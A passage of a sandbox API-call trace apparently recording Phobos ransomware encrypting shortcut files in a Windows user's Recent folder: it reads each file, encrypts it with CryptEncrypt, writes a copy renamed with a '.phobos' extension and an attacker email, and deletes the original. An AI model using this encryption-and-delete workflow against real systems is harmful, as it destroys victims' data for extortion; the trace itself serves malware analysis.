lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe0e, lpOverlapped=0x0) returned 1 [0200.559] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe10, dwBufLen=0xe10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe10) returned 1 [0200.559] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe10, lpOverlapped=0x0) returned 1 [0200.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.560] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.560] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.560] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.560] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.560] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.560] CloseHandle (hObject=0xfc) returned 1 [0200.560] CloseHandle (hObject=0x124) returned 1 [0200.560] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DSJNb7yWzXXdM9R.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dsjnb7ywzxxdm9r.lnk")) returned 1 [0200.561] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.563] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=988) returned 1 [0200.563] CloseHandle (hObject=0x124) returned 1 [0200.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk")) returned 0x20 [0200.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.564] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.564] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.565] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.565] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3dc, lpOverlapped=0x0) returned 1 [0200.567] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e0, dwBufLen=0x3e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3e0) returned 1 [0200.567] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3e0, lpOverlapped=0x0) returned 1 [0200.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.568] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.568] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.568] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.568] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.568] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.568] CloseHandle (hObject=0x124) returned 1 [0200.568] CloseHandle (hObject=0xfc) returned 1 [0200.569] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DxhDeU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dxhdeu.lnk")) returned 1 [0200.569] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.570] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5248) returned 1 [0200.570] CloseHandle (hObject=0xfc) returned 1 [0200.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk")) returned 0x20 [0200.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.572] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.572] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.573] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.573] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1480, lpOverlapped=0x0) returned 1 [0200.578] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1490, dwBufLen=0x1490 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1490) returned 1 [0200.578] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1490, lpOverlapped=0x0) returned 1 [0200.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.579] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.579] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.579] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.579] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.579] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.579] CloseHandle (hObject=0xfc) returned 1 [0200.579] CloseHandle (hObject=0x124) returned 1 [0200.579] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\erKA1htmg.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\erka1htmg.ots.lnk")) returned 1 [0200.580] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.581] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1060) returned 1 [0200.581] CloseHandle (hObject=0x124) returned 1 [0200.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk")) returned 0x20 [0200.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.581] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.581] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.582] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.582] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x424, lpOverlapped=0x0) returned 1 [0200.584] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x430, dwBufLen=0x430 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x430) returned 1 [0200.584] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x430, lpOverlapped=0x0) returned 1 [0200.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.585] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.585] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0200.585] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.585] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0200.585] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.585] CloseHandle (hObject=0x124) returned 1 [0200.585] CloseHandle (hObject=0xfc) returned 1 [0200.585] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F9iQBTh6JsYE3NMw8go0.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f9iqbth6jsye3nmw8go0.mkv.lnk")) returned 1 [0200.586] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.588] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6759) returned 1 [0200.588] CloseHandle (hObject=0xfc) returned 1 [0200.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk")) returned 0x20 [0200.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.588] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.588] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.589] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.589] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a67, lpOverlapped=0x0) returned 1 [0200.591] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a70, dwBufLen=0x1a70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a70) returned 1 [0200.591] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a70, lpOverlapped=0x0) returned 1 [0200.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.593] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.593] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.593] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.593] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.593] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.593] CloseHandle (hObject=0xfc) returned 1 [0200.593] CloseHandle (hObject=0x124) returned 1 [0200.593] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Fa5ewUOgzE3xDAR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fa5ewuogze3xdar.lnk")) returned 1 [0200.594] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.596] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3765) returned 1 [0200.596] CloseHandle (hObject=0x124) returned 1 [0200.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk")) returned 0x20 [0200.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.596] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.596] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 